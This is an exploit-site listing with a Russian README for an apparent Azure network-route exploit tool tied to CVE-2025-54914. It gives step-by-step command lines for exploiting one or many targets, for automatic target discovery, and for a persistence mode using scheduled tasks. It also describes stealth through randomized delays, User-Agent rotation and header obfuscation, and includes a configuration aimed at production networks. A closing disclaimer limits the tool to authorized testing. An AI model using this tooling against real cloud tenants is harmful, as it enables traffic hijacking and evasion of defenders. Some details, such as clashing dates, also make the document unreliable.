Sploitus

Exploit for CVE-2025-54914-PoC

kitploit · 2026-08-31

Exploit Code

MARKDOWN406 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ASH1996X-CVE-2025-54914-POC
# CVE-2025-54914 Эксплойт маршрутов Azure

## Обзор

Это улучшенная реализация эксплойта для маршрутизации сети Azure по уязвимости CVE-2025-54914. Данная версия сохраняет основную функциональность CVE, добавляя такие возможности, как персистентность, обход обнаружения, сканирование нескольких целей и обработка ошибок.

## Возможности

### Базовая функциональность CVE

  * **Создание маршрута** : Создание вредоносных маршрутов в виртуальных сетях Azure
  * **Удаление маршрута** : Удаление созданных маршрутов для очистки
  * **Совместимость с API** : Работает с Azure Management API 2025-09-01
  * **Аутентификация** : Поддерживает Azure CLI и ручную аутентификацию по токену



### Дополнительные возможности

  * **Методы обхода** : Случайные задержки, ротация User-Agent, обфускация запросов
  * **Персистентность** : Создание запланированных задач, режим непрерывного мониторинга
  * **Многоцелевое сканирование** : Одновременное сканирование и эксплуатация нескольких целей
  * **Полноценное отчётность** : Детальные отчёты с анализом успехов/неудач
  * **Обработка ошибок** : Корректная обработка сбоев и восстановление
  * **Управление конфигурацией** : Конфигурация целей на основе JSON
  * **Обнаружение целей** : Автоматическое обнаружение уязвимых ресурсов
  * **Оценка рисков** : Анализ уязвимостей и оценка рисков



## Установка

### Предварительные требования

root@kitploit:~
    
    
    # Установка зависимостей Python
    pip install requests
    
    # Установка Azure CLI (для аутентификации)
    curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
    

### Настройка

root@kitploit:~
    
    
    # Назначение прав на выполнение скриптов
    chmod +x exploit.py
    chmod +x exploit_utils.py
    
    # Аутентификация в Azure
    az login
    

## Использование

### Базовое использование

#### Эксплуатация одной цели

root@kitploit:~
    
    
    # Создание маршрута на одной цели
    python exploit.py \
        --subscription-id "12345678-1234-1234-1234-123456789012" \
        --resource-group "production-rg" \
        --vnet-name "prod-vnet" \
        --subnet-name "prod-subnet" \
        --address-prefix "10.0.1.0/24" \
        --next-hop-ip "10.0.2.5"
    
    # Удаление маршрута
    python exploit.py \
        --subscription-id "12345678-1234-1234-1234-123456789012" \
        --resource-group "production-rg" \
        --vnet-name "prod-vnet" \
        --subnet-name "prod-subnet" \
        --route-name "exploit-route-1" \
        --operation delete
    

#### Эксплуатация нескольких целей

root@kitploit:~
    
    
    # Создание файла конфигурации
    python exploit_utils.py discover --output targets.json
    
    # Эксплуатация всех целей
    python exploit.py --targets-file targets.json --operation create
    

#### Режим сканирования

root@kitploit:~
    
    
    # Сканирование целей без эксплуатации
    python exploit.py --targets-file targets.json --scan-only
    

#### Режим персистентности

root@kitploit:~
    
    
    # Включение персистентности с интервалом 30 минут
    python exploit.py --targets-file targets.json --persistence-mode --interval 30
    

### Расширенное использование

#### Обход и скрытность

root@kitploit:~
    
    
    # Пользовательские диапазоны задержек для обхода
    python exploit.py \
        --targets-file targets.json \
        --delay-min 1.0 \
        --delay-max 5.0 \
        --max-workers 5
    

#### Режим холостого прогона

root@kitploit:~
    
    
    # Тестирование без фактической эксплуатации
    python exploit.py --targets-file targets.json --dry-run
    

#### Детальное логирование

root@kitploit:~
    
    
    # Включение отладки
    python exploit.py \
        --targets-file targets.json \
        --log-level DEBUG \
        --log-file exploit.log
    

## Конфигурация

### Формат конфигурации целей

root@kitploit:~
    
    
    {
      "targets": [
        {
          "subscription_id": "12345678-1234-1234-1234-123456789012",
          "resource_group": "production-rg",
          "vnet_name": "prod-vnet",
          "subnet_name": "prod-subnet",
          "route_name": "exploit-route-1",
          "address_prefix": "10.0.1.0/24",
          "next_hop_type": "VirtualAppliance",
          "next_hop_ip": "10.0.2.5",
          "api_version": "2025-09-01",
          "priority": 1
        }
      ],
      "metadata": {
        "description": "Конфигурация целей для CVE-2025-54914",
        "created": "2025-01-09",
        "version": "1.0"
      }
    }
    

### Переменные окружения

root@kitploit:~
    
    
    # Токен доступа Azure (альтернатива Azure CLI)
    export AZURE_ACCESS_TOKEN="your_token_here"
    
    # Уровень логирования
    export LOG_LEVEL="INFO"
    

## Вспомогательные скрипты

### Обнаружение целей

root@kitploit:~
    
    
    # Обнаружение всех доступных целей
    python exploit_utils.py discover --output discovered_targets.json
    
    # Обнаружение конкретных подписок
    python exploit_utils.py discover \
        --subscription-ids "sub1" "sub2" \
        --output targets.json \
        --report discovery_report.txt
    

### Генерация конфигурации

root@kitploit:~
    
    
    # Создание конфигурации эксплойта из обнаруженных целей
    python exploit_utils.py config \
        --input discovered_targets.json \
        --output exploit_config.json \
        --address-prefix "10.0.1.0/24" \
        --next-hop-ip "10.0.2.5"
    

### Анализ уязвимостей

root@kitploit:~
    
    
    # Анализ целей для оценки рисков
    python exploit_utils.py analyze \
        --input targets.json \
        --output vulnerability_report.txt
    

## Функции безопасности

### Методы обхода

  * **Время отправки запросов** : Случайные задержки между запросами
  * **Ротация User-Agent** : Несколько пользовательских агентов браузеров
  * **Обфускация заголовков** : Реалистичные HTTP-заголовки
  * **Проверка SSL** : Корректная проверка сертификатов



### Механизмы персистентности

  * **Запланированные задачи** : Создание задач в планировщике Windows
  * **Непрерывный режим** : Долговременная персистентность
  * **Управление сессиями** : Сохранение состояния между запусками
  * **Персистентность конфигурации** : Сохранение настроек на диск



### Обработка ошибок

  * **Корректная деградация** : Продолжение работы при отдельных сбоях
  * **Защита от тайм-аутов** : Предотвращение зависания запросов
  * **Обработка сигналов** : Чистое завершение при прерывании
  * **Очистка ресурсов** : Автоматическая очистка при выходе



## Отчётность

### Отчёты об эксплуатации

  * **Результаты операций** : Успех/неудача для каждой цели
  * **Временная информация** : Временные метки выполнения
  * **Детали ошибок** : Подробные сообщения об ошибках
  * **Итоговая статистика** : Общие показатели успешности



### Отчёты об обнаружении

  * **Инвентаризация целей** : Полный список обнаруженных ресурсов
  * **Разбивка по подпискам** : Цели, сгруппированные по подпискам
  * **Детали ресурсов** : Информация о VNet, подсети и местоположении



### Анализ уязвимостей

  * **Оценка рисков** : Категоризация рисков: высокий/средний/низкий
  * **Индикаторы production** : Идентификация производственных сред
  * **Анализ тегов** : Оценка рисков на основе тегов ресурсов



## Рекомендации

### Операционная безопасность

  1. **Используйте холостой прогон** : Всегда сначала тестируйте с `--dry-run`
  2. **Ограничьте область** : Начинайте с непроизводственных сред
  3. **Мониторьте логи** : Просматривайте логи на предмет неожиданного поведения
  4. **Очищайте** : Удаляйте созданные маршруты после тестирования



### Оптимизация производительности

  1. **Лимиты воркеров** : Настраивайте `--max-workers` в зависимости от мощности системы
  2. **Настройка задержек** : Балансируйте скрытность и скорость с помощью параметров задержки
  3. **Пакетная обработка** : Используйте файлы целей для масштабных операций
  4. **Мониторинг ресурсов** : Следите за системными ресурсами во время выполнения



### Восстановление после ошибок

  1. **Проверьте логи** : Анализируйте сообщения об ошибках для диагностики
  2. **Проверьте разрешения** : Убедитесь в наличии необходимых прав Azure
  3. **Проверьте сетевое подключение** : Убедитесь в доступе к интернету
  4. **Проверьте токен** : Проверьте статус аутентификации Azure CLI



## Устранение неполадок

### Часто встречающиеся проблемы

#### Ошибки аутентификации

root@kitploit:~
    
    
    # Повторная аутентификация в Azure
    az login
    
    # Проверка текущего аккаунта
    az account show
    
    # Список доступных подписок
    az account list
    

#### Ошибки разрешений

root@kitploit:~
    
    
    # Проверка необходимых разрешений
    az role assignment list --assignee $(az account show --query user.name -o tsv)
    

#### Сетевые ошибки

root@kitploit:~
    
    
    # Проверка соединения
    curl -I https://management.azure.com
    
    # Проверка настроек прокси
    echo $HTTP_PROXY
    echo $HTTPS_PROXY
    

### Режим отладки

root@kitploit:~
    
    
    # Включение подробного логирования
    python exploit.py --log-level DEBUG --log-file debug.log
    
    # Просмотр файла лога
    tail -f debug.log
    

## Юридические и этические соображения

⚠️ **ВАЖНО** : Данный инструмент предназначен только для авторизованного тестирования безопасности.

  * **Требуется авторизация** : Используйте только на системах, которыми владеете, или на которые имеете явное разрешение на тестирование.
  * **Соблюдение законодательства** : Обеспечьте соответствие местным законам и нормативным актам.
  * **Ответственное раскрытие** : Сообщайте об уязвимостях через надлежащие каналы.
  * **Образовательное использование** : Инструмент предназначен для образовательных и исследовательских целей.



## Лицензия

Данный проект лицензирован только для исследовательского и образовательного использования. Коммерческое использование требует явного разрешения.

## Участие в разработке

  1. Сделайте форк репозитория
  2. Создайте ветку для новой функции
  3. Внесите изменения
  4. Добавьте тесты (если применимо)
  5. Отправьте pull request



## Поддержка

По вопросам и проблемам:

  1. Ознакомьтесь с разделом устранения неполадок
  2. Просмотрите логи на предмет деталей ошибок
  3. Создайте issue с подробной информацией
  4. Приложите соответствующую конфигурацию и сообщения об ошибках